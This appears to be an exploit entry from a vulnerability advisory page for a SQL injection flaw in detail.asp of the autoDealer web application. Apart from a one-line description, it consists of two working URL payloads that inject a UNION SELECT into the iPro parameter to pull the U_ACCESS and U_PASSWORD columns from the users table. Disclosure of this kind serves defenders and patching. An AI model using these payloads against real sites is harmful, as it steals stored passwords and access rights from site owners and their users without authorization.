• info
• discussion
• exploit
• solution
• references

autoDealer Detail.ASP SQL Injection Vulnerability

An attacker can exploit this issue via a web client.

The following examples are available to demonstrate this issue:

http://www.example.com/detail.asp?iPro=-1%20union%20select%200,0,U_ACCESS,0%20from%20users
http://www.example.com/detail.asp?iPro=-1%20union%20select%200,0,U_PASSWORD,0%20from%20users